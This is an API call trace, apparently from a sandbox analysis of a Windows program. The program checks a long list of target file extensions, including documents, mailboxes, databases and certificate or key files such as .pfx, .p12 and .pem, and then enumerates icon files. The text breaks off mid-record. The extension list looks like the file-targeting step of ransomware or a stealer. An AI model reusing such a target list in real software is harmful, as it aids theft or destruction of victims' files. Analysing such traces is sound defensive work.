[0196.073] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0196.073] lstrlenW (lpString=".dbx") returned 4 [0196.073] lstrcmpiW (lpString1=".dbx", lpString2=".ico") returned -1 [0196.073] lstrlenW (lpString=".dc3") returned 4 [0196.073] lstrcmpiW (lpString1=".dc3", lpString2=".ico") returned -1 [0196.073] lstrlenW (lpString=".dcm") returned 4 [0196.073] lstrcmpiW (lpString1=".dcm", lpString2=".ico") returned -1 [0196.073] lstrlenW (lpString=".dcr") returned 4 [0196.073] lstrcmpiW (lpString1=".dcr", lpString2=".ico") returned -1 [0196.073] lstrlenW (lpString=".der") returned 4 [0196.073] lstrcmpiW (lpString1=".der", lpString2=".ico") returned -1 [0196.073] lstrlenW (lpString=".dib") returned 4 [0196.073] lstrcmpiW (lpString1=".dib", lpString2=".ico") returned -1 [0196.073] lstrlenW (lpString=".dic") returned 4 [0196.074] lstrcmpiW (lpString1=".dic", lpString2=".ico") returned -1 [0196.074] lstrlenW (lpString=".dif") returned 4 [0196.074] lstrcmpiW (lpString1=".dif", lpString2=".ico") returned -1 [0196.074] lstrlenW (lpString=".divx") returned 5 [0196.074] lstrcmpiW (lpString1=".divx", lpString2="t.ico") returned -1 [0196.074] lstrlenW (lpString=".djvu") returned 5 [0196.074] lstrcmpiW (lpString1=".djvu", lpString2="t.ico") returned -1 [0196.074] lstrlenW (lpString=".dng") returned 4 [0196.074] lstrcmpiW (lpString1=".dng", lpString2=".ico") returned -1 [0196.074] lstrlenW (lpString=".doc") returned 4 [0196.074] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0196.074] lstrlenW (lpString=".docm") returned 5 [0196.075] lstrcmpiW (lpString1=".docm", lpString2="t.ico") returned -1 [0196.075] lstrlenW (lpString=".docx") returned 5 [0196.075] lstrcmpiW (lpString1=".docx", lpString2="t.ico") returned -1 [0196.075] lstrlenW (lpString=".dot") returned 4 [0196.075] lstrcmpiW (lpString1=".dot", lpString2=".ico") returned -1 [0196.075] lstrlenW (lpString=".dotm") returned 5 [0196.075] lstrcmpiW (lpString1=".dotm", lpString2="t.ico") returned -1 [0196.075] lstrlenW (lpString=".dotx") returned 5 [0196.075] lstrcmpiW (lpString1=".dotx", lpString2="t.ico") returned -1 [0196.075] lstrlenW (lpString=".dpx") returned 4 [0196.075] lstrcmpiW (lpString1=".dpx", lpString2=".ico") returned -1 [0196.075] lstrlenW (lpString=".dqy") returned 4 [0196.075] lstrcmpiW (lpString1=".dqy", lpString2=".ico") returned -1 [0196.075] lstrlenW (lpString=".dsn") returned 4 [0196.075] lstrcmpiW (lpString1=".dsn", lpString2=".ico") returned -1 [0196.075] lstrlenW (lpString=".dt") returned 3 [0196.076] lstrcmpiW (lpString1=".dt", lpString2="ico") returned -1 [0196.076] lstrlenW (lpString=".dtd") returned 4 [0196.076] lstrcmpiW (lpString1=".dtd", lpString2=".ico") returned -1 [0196.076] lstrlenW (lpString=".dwg") returned 4 [0196.076] lstrcmpiW (lpString1=".dwg", lpString2=".ico") returned -1 [0196.076] lstrlenW (lpString=".dwt") returned 4 [0196.076] lstrcmpiW (lpString1=".dwt", lpString2=".ico") returned -1 [0196.076] lstrlenW (lpString=".dx") returned 3 [0196.076] lstrcmpiW (lpString1=".dx", lpString2="ico") returned -1 [0196.076] lstrlenW (lpString=".dxf") returned 4 [0196.076] lstrcmpiW (lpString1=".dxf", lpString2=".ico") returned -1 [0196.076] lstrlenW (lpString=".edml") returned 5 [0196.076] lstrcmpiW (lpString1=".edml", lpString2="t.ico") returned -1 [0196.076] lstrlenW (lpString=".efd") returned 4 [0196.076] lstrcmpiW (lpString1=".efd", lpString2=".ico") returned -1 [0196.076] lstrlenW (lpString=".elf") returned 4 [0196.076] lstrcmpiW (lpString1=".elf", lpString2=".ico") returned -1 [0196.076] lstrlenW (lpString=".emf") returned 4 [0196.076] lstrcmpiW (lpString1=".emf", lpString2=".ico") returned -1 [0196.076] lstrlenW (lpString=".emz") returned 4 [0196.076] lstrcmpiW (lpString1=".emz", lpString2=".ico") returned -1 [0196.076] lstrlenW (lpString=".epf") returned 4 [0196.076] lstrcmpiW (lpString1=".epf", lpString2=".ico") returned -1 [0196.076] lstrlenW (lpString=".eps") returned 4 [0196.076] lstrcmpiW (lpString1=".eps", lpString2=".ico") returned -1 [0196.076] lstrlenW (lpString=".epsf") returned 5 [0196.076] lstrcmpiW (lpString1=".epsf", lpString2="t.ico") returned -1 [0196.076] lstrlenW (lpString=".epsp") returned 5 [0196.077] lstrcmpiW (lpString1=".epsp", lpString2="t.ico") returned -1 [0196.077] lstrlenW (lpString=".erf") returned 4 [0196.077] lstrcmpiW (lpString1=".erf", lpString2=".ico") returned -1 [0196.077] lstrlenW (lpString=".exr") returned 4 [0196.077] lstrcmpiW (lpString1=".exr", lpString2=".ico") returned -1 [0196.077] lstrlenW (lpString=".f4v") returned 4 [0196.077] lstrcmpiW (lpString1=".f4v", lpString2=".ico") returned -1 [0196.077] lstrlenW (lpString=".fido") returned 5 [0196.077] lstrcmpiW (lpString1=".fido", lpString2="t.ico") returned -1 [0196.077] lstrlenW (lpString=".flm") returned 4 [0196.077] lstrcmpiW (lpString1=".flm", lpString2=".ico") returned -1 [0196.077] lstrlenW (lpString=".flv") returned 4 [0196.077] lstrcmpiW (lpString1=".flv", lpString2=".ico") returned -1 [0196.077] lstrlenW (lpString=".frm") returned 4 [0196.077] lstrcmpiW (lpString1=".frm", lpString2=".ico") returned -1 [0196.077] lstrlenW (lpString=".fxg") returned 4 [0196.077] lstrcmpiW (lpString1=".fxg", lpString2=".ico") returned -1 [0196.077] lstrlenW (lpString=".geo") returned 4 [0196.077] lstrcmpiW (lpString1=".geo", lpString2=".ico") returned -1 [0196.077] lstrlenW (lpString=".gif") returned 4 [0196.077] lstrcmpiW (lpString1=".gif", lpString2=".ico") returned -1 [0196.077] lstrlenW (lpString=".grs") returned 4 [0196.077] lstrcmpiW (lpString1=".grs", lpString2=".ico") returned -1 [0196.077] lstrlenW (lpString=".gz") returned 3 [0196.077] lstrcmpiW (lpString1=".gz", lpString2="ico") returned -1 [0196.077] lstrlenW (lpString=".h") returned 2 [0196.077] lstrcmpiW (lpString1=".h", lpString2="co") returned -1 [0196.078] lstrlenW (lpString=".hdr") returned 4 [0196.078] lstrcmpiW (lpString1=".hdr", lpString2=".ico") returned -1 [0196.078] lstrlenW (lpString=".hpp") returned 4 [0196.078] lstrcmpiW (lpString1=".hpp", lpString2=".ico") returned -1 [0196.078] lstrlenW (lpString=".hta") returned 4 [0196.078] lstrcmpiW (lpString1=".hta", lpString2=".ico") returned -1 [0196.078] lstrlenW (lpString=".htc") returned 4 [0196.078] lstrcmpiW (lpString1=".htc", lpString2=".ico") returned -1 [0196.078] lstrlenW (lpString=".htm") returned 4 [0196.078] lstrcmpiW (lpString1=".htm", lpString2=".ico") returned -1 [0196.078] lstrlenW (lpString=".html") returned 5 [0196.078] lstrcmpiW (lpString1=".html", lpString2="t.ico") returned -1 [0196.078] lstrlenW (lpString=".icb") returned 4 [0196.078] lstrcmpiW (lpString1=".icb", lpString2=".ico") returned -1 [0196.078] lstrlenW (lpString=".ics") returned 4 [0196.078] lstrcmpiW (lpString1=".ics", lpString2=".ico") returned 1 [0196.078] lstrlenW (lpString=".iff") returned 4 [0196.078] lstrcmpiW (lpString1=".iff", lpString2=".ico") returned 1 [0196.078] lstrlenW (lpString=".inc") returned 4 [0196.078] lstrcmpiW (lpString1=".inc", lpString2=".ico") returned 1 [0196.078] lstrlenW (lpString=".indd") returned 5 [0196.078] lstrcmpiW (lpString1=".indd", lpString2="t.ico") returned -1 [0196.078] lstrlenW (lpString=".ini") returned 4 [0196.078] lstrcmpiW (lpString1=".ini", lpString2=".ico") returned 1 [0196.078] lstrlenW (lpString=".iqy") returned 4 [0196.078] lstrcmpiW (lpString1=".iqy", lpString2=".ico") returned 1 [0196.078] lstrlenW (lpString=".j2c") returned 4 [0196.078] lstrcmpiW (lpString1=".j2c", lpString2=".ico") returned 1 [0196.079] lstrlenW (lpString=".j2k") returned 4 [0196.079] lstrcmpiW (lpString1=".j2k", lpString2=".ico") returned 1 [0196.079] lstrlenW (lpString=".java") returned 5 [0196.079] lstrcmpiW (lpString1=".java", lpString2="t.ico") returned -1 [0196.079] lstrlenW (lpString=".jp2") returned 4 [0196.079] lstrcmpiW (lpString1=".jp2", lpString2=".ico") returned 1 [0196.079] lstrlenW (lpString=".jpc") returned 4 [0196.079] lstrcmpiW (lpString1=".jpc", lpString2=".ico") returned 1 [0196.079] lstrlenW (lpString=".jpe") returned 4 [0196.079] lstrcmpiW (lpString1=".jpe", lpString2=".ico") returned 1 [0196.079] lstrlenW (lpString=".jpeg") returned 5 [0196.079] lstrcmpiW (lpString1=".jpeg", lpString2="t.ico") returned -1 [0196.079] lstrlenW (lpString=".jpf") returned 4 [0196.079] lstrcmpiW (lpString1=".jpf", lpString2=".ico") returned 1 [0196.079] lstrlenW (lpString=".jpg") returned 4 [0196.079] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0196.079] lstrlenW (lpString=".jpx") returned 4 [0196.079] lstrcmpiW (lpString1=".jpx", lpString2=".ico") returned 1 [0196.079] lstrlenW (lpString=".js") returned 3 [0196.079] lstrcmpiW (lpString1=".js", lpString2="ico") returned -1 [0196.079] lstrlenW (lpString=".jsf") returned 4 [0196.079] lstrcmpiW (lpString1=".jsf", lpString2=".ico") returned 1 [0196.079] lstrlenW (lpString=".json") returned 5 [0196.079] lstrcmpiW (lpString1=".json", lpString2="t.ico") returned -1 [0196.079] lstrlenW (lpString=".jsp") returned 4 [0196.079] lstrcmpiW (lpString1=".jsp", lpString2=".ico") returned 1 [0196.079] lstrlenW (lpString=".kdc") returned 4 [0196.080] lstrcmpiW (lpString1=".kdc", lpString2=".ico") returned 1 [0196.080] lstrlenW (lpString=".kmz") returned 4 [0196.080] lstrcmpiW (lpString1=".kmz", lpString2=".ico") returned 1 [0196.080] lstrlenW (lpString=".kwm") returned 4 [0196.080] lstrcmpiW (lpString1=".kwm", lpString2=".ico") returned 1 [0196.080] lstrlenW (lpString=".lasso") returned 6 [0196.080] lstrcmpiW (lpString1=".lasso", lpString2="nt.ico") returned -1 [0196.080] lstrlenW (lpString=".lbi") returned 4 [0196.080] lstrcmpiW (lpString1=".lbi", lpString2=".ico") returned 1 [0196.080] lstrlenW (lpString=".lgf") returned 4 [0196.080] lstrcmpiW (lpString1=".lgf", lpString2=".ico") returned 1 [0196.080] lstrlenW (lpString=".lgp") returned 4 [0196.080] lstrcmpiW (lpString1=".lgp", lpString2=".ico") returned 1 [0196.080] lstrlenW (lpString=".log") returned 4 [0196.080] lstrcmpiW (lpString1=".log", lpString2=".ico") returned 1 [0196.080] lstrlenW (lpString=".m1v") returned 4 [0196.080] lstrcmpiW (lpString1=".m1v", lpString2=".ico") returned 1 [0196.080] lstrlenW (lpString=".m4a") returned 4 [0196.080] lstrcmpiW (lpString1=".m4a", lpString2=".ico") returned 1 [0196.080] lstrlenW (lpString=".m4v") returned 4 [0196.080] lstrcmpiW (lpString1=".m4v", lpString2=".ico") returned 1 [0196.080] lstrlenW (lpString=".max") returned 4 [0196.080] lstrcmpiW (lpString1=".max", lpString2=".ico") returned 1 [0196.080] lstrlenW (lpString=".md") returned 3 [0196.080] lstrcmpiW (lpString1=".md", lpString2="ico") returned -1 [0196.080] lstrlenW (lpString=".mda") returned 4 [0196.080] lstrcmpiW (lpString1=".mda", lpString2=".ico") returned 1 [0196.081] lstrlenW (lpString=".mdb") returned 4 [0196.081] lstrcmpiW (lpString1=".mdb", lpString2=".ico") returned 1 [0196.081] lstrlenW (lpString=".mde") returned 4 [0196.081] lstrcmpiW (lpString1=".mde", lpString2=".ico") returned 1 [0196.081] lstrlenW (lpString=".mdf") returned 4 [0196.081] lstrcmpiW (lpString1=".mdf", lpString2=".ico") returned 1 [0196.081] lstrlenW (lpString=".mdw") returned 4 [0196.081] lstrcmpiW (lpString1=".mdw", lpString2=".ico") returned 1 [0196.081] lstrlenW (lpString=".mef") returned 4 [0196.081] lstrcmpiW (lpString1=".mef", lpString2=".ico") returned 1 [0196.081] lstrlenW (lpString=".mft") returned 4 [0196.081] lstrcmpiW (lpString1=".mft", lpString2=".ico") returned 1 [0196.081] lstrlenW (lpString=".mfw") returned 4 [0196.081] lstrcmpiW (lpString1=".mfw", lpString2=".ico") returned 1 [0196.081] lstrlenW (lpString=".mht") returned 4 [0196.081] lstrcmpiW (lpString1=".mht", lpString2=".ico") returned 1 [0196.081] lstrlenW (lpString=".mhtml") returned 6 [0196.081] lstrcmpiW (lpString1=".mhtml", lpString2="nt.ico") returned -1 [0196.081] lstrlenW (lpString=".mka") returned 4 [0196.081] lstrcmpiW (lpString1=".mka", lpString2=".ico") returned 1 [0196.081] lstrlenW (lpString=".mkidx") returned 6 [0196.081] lstrcmpiW (lpString1=".mkidx", lpString2="nt.ico") returned -1 [0196.081] lstrlenW (lpString=".mkv") returned 4 [0196.081] lstrcmpiW (lpString1=".mkv", lpString2=".ico") returned 1 [0196.081] lstrlenW (lpString=".mos") returned 4 [0196.081] lstrcmpiW (lpString1=".mos", lpString2=".ico") returned 1 [0196.081] lstrlenW (lpString=".mov") returned 4 [0196.081] lstrcmpiW (lpString1=".mov", lpString2=".ico") returned 1 [0196.082] lstrlenW (lpString=".mp3") returned 4 [0196.082] lstrcmpiW (lpString1=".mp3", lpString2=".ico") returned 1 [0196.082] lstrlenW (lpString=".mp4") returned 4 [0196.082] lstrcmpiW (lpString1=".mp4", lpString2=".ico") returned 1 [0196.082] lstrlenW (lpString=".mpeg") returned 5 [0196.082] lstrcmpiW (lpString1=".mpeg", lpString2="t.ico") returned -1 [0196.082] lstrlenW (lpString=".mpg") returned 4 [0196.082] lstrcmpiW (lpString1=".mpg", lpString2=".ico") returned 1 [0196.082] lstrlenW (lpString=".mpv") returned 4 [0196.082] lstrcmpiW (lpString1=".mpv", lpString2=".ico") returned 1 [0196.082] lstrlenW (lpString=".mrw") returned 4 [0196.082] lstrcmpiW (lpString1=".mrw", lpString2=".ico") returned 1 [0196.082] lstrlenW (lpString=".msg") returned 4 [0196.082] lstrcmpiW (lpString1=".msg", lpString2=".ico") returned 1 [0196.082] lstrlenW (lpString=".mxl") returned 4 [0196.082] lstrcmpiW (lpString1=".mxl", lpString2=".ico") returned 1 [0196.082] lstrlenW (lpString=".myd") returned 4 [0196.082] lstrcmpiW (lpString1=".myd", lpString2=".ico") returned 1 [0196.082] lstrlenW (lpString=".myi") returned 4 [0196.082] lstrcmpiW (lpString1=".myi", lpString2=".ico") returned 1 [0196.082] lstrlenW (lpString=".nef") returned 4 [0196.082] lstrcmpiW (lpString1=".nef", lpString2=".ico") returned 1 [0196.082] lstrlenW (lpString=".nrw") returned 4 [0196.082] lstrcmpiW (lpString1=".nrw", lpString2=".ico") returned 1 [0196.082] lstrlenW (lpString=".obj") returned 4 [0196.082] lstrcmpiW (lpString1=".obj", lpString2=".ico") returned 1 [0196.082] lstrlenW (lpString=".odb") returned 4 [0196.082] lstrcmpiW (lpString1=".odb", lpString2=".ico") returned 1 [0196.083] lstrlenW (lpString=".odc") returned 4 [0196.083] lstrcmpiW (lpString1=".odc", lpString2=".ico") returned 1 [0196.083] lstrlenW (lpString=".odm") returned 4 [0196.083] lstrcmpiW (lpString1=".odm", lpString2=".ico") returned 1 [0196.083] lstrlenW (lpString=".odp") returned 4 [0196.083] lstrcmpiW (lpString1=".odp", lpString2=".ico") returned 1 [0196.083] lstrlenW (lpString=".ods") returned 4 [0196.083] lstrcmpiW (lpString1=".ods", lpString2=".ico") returned 1 [0196.083] lstrlenW (lpString=".oft") returned 4 [0196.083] lstrcmpiW (lpString1=".oft", lpString2=".ico") returned 1 [0196.083] lstrlenW (lpString=".one") returned 4 [0196.083] lstrcmpiW (lpString1=".one", lpString2=".ico") returned 1 [0196.083] lstrlenW (lpString=".onepkg") returned 7 [0196.083] lstrcmpiW (lpString1=".onepkg", lpString2="int.ico") returned -1 [0196.083] lstrlenW (lpString=".onetoc2") returned 8 [0196.083] lstrcmpiW (lpString1=".onetoc2", lpString2="rint.ico") returned -1 [0196.083] lstrlenW (lpString=".opt") returned 4 [0196.083] lstrcmpiW (lpString1=".opt", lpString2=".ico") returned 1 [0196.083] lstrlenW (lpString=".oqy") returned 4 [0196.083] lstrcmpiW (lpString1=".oqy", lpString2=".ico") returned 1 [0196.083] lstrlenW (lpString=".orf") returned 4 [0196.083] lstrcmpiW (lpString1=".orf", lpString2=".ico") returned 1 [0196.083] lstrlenW (lpString=".p12") returned 4 [0196.083] lstrcmpiW (lpString1=".p12", lpString2=".ico") returned 1 [0196.083] lstrlenW (lpString=".p7b") returned 4 [0196.083] lstrcmpiW (lpString1=".p7b", lpString2=".ico") returned 1 [0196.083] lstrlenW (lpString=".p7c") returned 4 [0196.084] lstrcmpiW (lpString1=".p7c", lpString2=".ico") returned 1 [0196.084] lstrlenW (lpString=".pam") returned 4 [0196.084] lstrcmpiW (lpString1=".pam", lpString2=".ico") returned 1 [0196.084] lstrlenW (lpString=".pbm") returned 4 [0196.084] lstrcmpiW (lpString1=".pbm", lpString2=".ico") returned 1 [0196.084] lstrlenW (lpString=".pct") returned 4 [0196.084] lstrcmpiW (lpString1=".pct", lpString2=".ico") returned 1 [0196.084] lstrlenW (lpString=".pcx") returned 4 [0196.084] lstrcmpiW (lpString1=".pcx", lpString2=".ico") returned 1 [0196.084] lstrlenW (lpString=".pdd") returned 4 [0196.084] lstrcmpiW (lpString1=".pdd", lpString2=".ico") returned 1 [0196.084] lstrlenW (lpString=".pdf") returned 4 [0196.084] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0196.084] lstrlenW (lpString=".pdp") returned 4 [0196.084] lstrcmpiW (lpString1=".pdp", lpString2=".ico") returned 1 [0196.084] lstrlenW (lpString=".pef") returned 4 [0196.084] lstrcmpiW (lpString1=".pef", lpString2=".ico") returned 1 [0196.084] lstrlenW (lpString=".pem") returned 4 [0196.084] lstrcmpiW (lpString1=".pem", lpString2=".ico") returned 1 [0196.084] lstrlenW (lpString=".pff") returned 4 [0196.084] lstrcmpiW (lpString1=".pff", lpString2=".ico") returned 1 [0196.084] lstrlenW (lpString=".pfm") returned 4 [0196.084] lstrcmpiW (lpString1=".pfm", lpString2=".ico") returned 1 [0196.084] lstrlenW (lpString=".pfx") returned 4 [0196.084] lstrcmpiW (lpString1=".pfx", lpString2=".ico") returned 1 [0196.084] lstrlenW (lpString=".pgm") returned 4 [0196.084] lstrcmpiW (lpString1=".pgm", lpString2=".ico") returned 1 [0196.084] lstrlenW (lpString=".php") returned 4 [0196.085] lstrcmpiW (lpString1=".php", lpString2=".ico") returned 1 [0196.085] lstrlenW (lpString=".php3") returned 5 [0196.085] lstrcmpiW (lpString1=".php3", lpString2="t.ico") returned -1 [0196.085] lstrlenW (lpString=".php4") returned 5 [0196.085] lstrcmpiW (lpString1=".php4", lpString2="t.ico") returned -1 [0196.085] lstrlenW (lpString=".php5") returned 5 [0196.085] lstrcmpiW (lpString1=".php5", lpString2="t.ico") returned -1 [0196.085] lstrlenW (lpString=".phtml") returned 6 [0196.085] lstrcmpiW (lpString1=".phtml", lpString2="nt.ico") returned -1 [0196.085] lstrlenW (lpString=".pict") returned 5 [0196.085] lstrcmpiW (lpString1=".pict", lpString2="t.ico") returned -1 [0196.085] lstrlenW (lpString=".pl") returned 3 [0196.085] lstrcmpiW (lpString1=".pl", lpString2="ico") returned -1 [0196.085] lstrlenW (lpString=".pls") returned 4 [0196.085] lstrcmpiW (lpString1=".pls", lpString2=".ico") returned 1 [0196.085] lstrlenW (lpString=".pm") returned 3 [0196.085] lstrcmpiW (lpString1=".pm", lpString2="ico") returned -1 [0196.085] lstrlenW (lpString=".png") returned 4 [0196.085] lstrcmpiW (lpString1=".png", lpString2=".ico") returned 1 [0196.085] lstrlenW (lpString=".pnm") returned 4 [0196.085] lstrcmpiW (lpString1=".pnm", lpString2=".ico") returned 1 [0196.085] lstrlenW (lpString=".pot") returned 4 [0196.085] lstrcmpiW (lpString1=".pot", lpString2=".ico") returned 1 [0196.085] lstrlenW (lpString=".potm") returned 5 [0196.085] lstrcmpiW (lpString1=".potm", lpString2="t.ico") returned -1 [0196.085] lstrlenW (lpString=".potx") returned 5 [0196.085] lstrcmpiW (lpString1=".potx", lpString2="t.ico") returned -1 [0196.085] lstrlenW (lpString=".ppa") returned 4 [0196.086] lstrcmpiW (lpString1=".ppa", lpString2=".ico") returned 1 [0196.086] lstrlenW (lpString=".ppam") returned 5 [0196.086] lstrcmpiW (lpString1=".ppam", lpString2="t.ico") returned -1 [0196.086] lstrlenW (lpString=".ppm") returned 4 [0196.086] lstrcmpiW (lpString1=".ppm", lpString2=".ico") returned 1 [0196.086] lstrlenW (lpString=".pps") returned 4 [0196.086] lstrcmpiW (lpString1=".pps", lpString2=".ico") returned 1 [0196.086] lstrlenW (lpString=".ppsm") returned 5 [0196.086] lstrcmpiW (lpString1=".ppsm", lpString2="t.ico") returned -1 [0196.086] lstrlenW (lpString=".ppt") returned 4 [0196.086] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0196.086] lstrlenW (lpString=".pptm") returned 5 [0196.086] lstrcmpiW (lpString1=".pptm", lpString2="t.ico") returned -1 [0196.086] lstrlenW (lpString=".pptx") returned 5 [0196.086] lstrcmpiW (lpString1=".pptx", lpString2="t.ico") returned -1 [0196.086] lstrlenW (lpString=".prn") returned 4 [0196.086] lstrcmpiW (lpString1=".prn", lpString2=".ico") returned 1 [0196.086] lstrlenW (lpString=".ps") returned 3 [0196.086] lstrcmpiW (lpString1=".ps", lpString2="ico") returned -1 [0196.086] lstrlenW (lpString=".psb") returned 4 [0196.086] lstrcmpiW (lpString1=".psb", lpString2=".ico") returned 1 [0196.086] lstrlenW (lpString=".psd") returned 4 [0196.086] lstrcmpiW (lpString1=".psd", lpString2=".ico") returned 1 [0196.086] lstrlenW (lpString=".pst") returned 4 [0196.086] lstrcmpiW (lpString1=".pst", lpString2=".ico") returned 1 [0196.086] lstrlenW (lpString=".ptx") returned 4 [0196.086] lstrcmpiW (lpString1=".ptx", lpString2=".ico") returned 1 [0196.087] lstrlenW (lpString=".pub") returned 4 [0196.087] lstrcmpiW (lpString1=".pub", lpString2=".ico") returned 1 [0196.087] lstrlenW (lpString=".pwm") returned 4 [0196.087] lstrcmpiW (lpString1=".pwm", lpString2=".ico") returned 1 [0196.087] lstrlenW (lpString=".pxr") returned 4 [0196.087] lstrcmpiW (lpString1=".pxr", lpString2=".ico") returned 1 [0196.087] lstrlenW (lpString=".py") returned 3 [0196.087] lstrcmpiW (lpString1=".py", lpString2="ico") returned -1 [0196.087] lstrlenW (lpString=".qt") returned 3 [0196.087] lstrcmpiW (lpString1=".qt", lpString2="ico") returned -1 [0196.087] lstrlenW (lpString=".r3d") returned 4 [0196.087] lstrcmpiW (lpString1=".r3d", lpString2=".ico") returned 1 [0196.087] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate1.ico", cAlternateFileName="")) returned 1 [0196.087] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate2.ico", cAlternateFileName="")) returned 1 [0196.087] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate3.ico", cAlternateFileName="")) returned 1 [0196.088] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate4.ico", cAlternateFileName="")) returned 1 [0196.088] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate5.ico", cAlternateFileName="")) returned 1 [0196.088] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate6.ico", cAlternateFileName="")) returned 1 [0196.088] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate7.ico", cAlternateFileName="")) returned 1 [0196.088] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Rotate8.ico", cAlternateFileName="")) returned 1 [0196.088] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Save.ico", cAlternateFileName="")) returned 1 [0196.088] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x8f66, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.ico", cAlternateFileName="")) returned 1 [0196.089] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b5e7f00, ftCreationTime.dwHighDateTime=0x1ca927c, ftLastAccessTime.dwLowDateTime=0x5b5e7f00, ftLastAccessTime.dwHighDateTime=0x1ca927c, 